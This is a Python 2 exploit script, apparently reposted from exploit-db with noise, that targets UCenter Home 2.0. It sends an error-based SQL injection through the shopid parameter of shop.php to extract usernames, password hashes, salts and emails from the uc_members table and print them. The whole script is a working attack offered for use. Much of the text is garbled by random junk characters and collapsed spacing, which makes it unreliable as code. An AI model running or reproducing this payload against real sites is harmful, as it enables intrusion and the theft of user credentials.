#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl% B! e/ `+ c5 B5 x
& Y1 @( r+ }( `4 N3 [+ A
: N0 I8 S, j& t$ M( l#!/usr/bin/env python / ^/ [" k& w: T( [7 V' G; l* f+ G) f
% }8 ~" q/ y' n* ?
import sys
5 h+ \" m* n4 z# wimport urllib2 0 f$ j2 a1 A1 o1 A- Y7 ~5 P: S- U
import re : x# D2 @6 j2 z6 Q9 _$ w. R9 c
' m6 I. J6 o; m# Y) v) idef info():
( V" ^0 M+ I) ? print 'From:http://www.exploit-db.com/exploits/14997/'
! `/ o, g( }5 P p; ^: l7 S print 'http://www.hake.cc/Web_loudong/'
" n" D# s8 O; P0 C print 'changed:qiaoy' 7 q5 n( U( ]" T7 i1 d
print 'exp:'
8 _/ Z( ~& Q# V( H4 b8 \6 \3 v print ' ./UCenter_Home_2.0.py site' 7 [" r$ D) ~% g; x) Z: c: W1 l) J5 U
$ r! D8 J1 ?1 ?0 m7 B6 g! B" W
def main(): 1 K0 p. {5 V- A, T t) p! w! m/ V& N7 }- h- B
if len(sys.argv) != 2: ' F. |" b) _" ?% x
info() 1 P3 E8 k: C M E* Y1 Z
else: & Q' v4 t5 R) j) |. n2 t7 S
site = sys.argv[1] 4 f4 @1 x# s9 B/ c* t8 w4 [
if site[0:7] == 'http://':
2 Z8 n0 N- q5 ^2 G. ]6 R0 l sitesite =site 5 D% l0 L# N9 L/ f6 u. J
elif site[0:8] == 'https://': ' Z5 c/ m3 U- a; @. \7 w% B$ z
sitesite = site
4 T$ t8 U9 l. u# L( F, [% T else:
% u3 S, ?9 Q G8 [' {$ ~ site = 'http://'+site ; X' {. L7 O+ D/ f3 Y
try: & p2 D6 X1 A4 U( e P
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' 7 z0 M6 \. Z6 V
Value = urllib2.urlopen(url).read()
$ T7 a2 n. v+ z Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] # T- x# K; i) r% H' N2 x
hacked = Msg.split(':') 8 f6 C. p' O% r+ D3 Z6 s0 @7 C; j
print 'Name: '+hacked[1] ' x! S* r5 E. b
print 'Passwd: '+hacked[2] ' n6 A# M2 L6 l: @( Z7 y
print 'salt: '+hacked[3]
& [/ D2 o/ N* r5 j print 'email: '+hacked[4] ) g+ H4 v! O: q* @
except:
~5 Y' Z4 m- q- x) }0 \1 q print 'Sorry,I can\'t work............'
1 F: q' S% i: G2 S0 P# k8 { + O" H8 S- z; D: a
if __name__ == '__main__':
$ j/ b7 u( M7 P* I8 J* H& f4 N( U main() |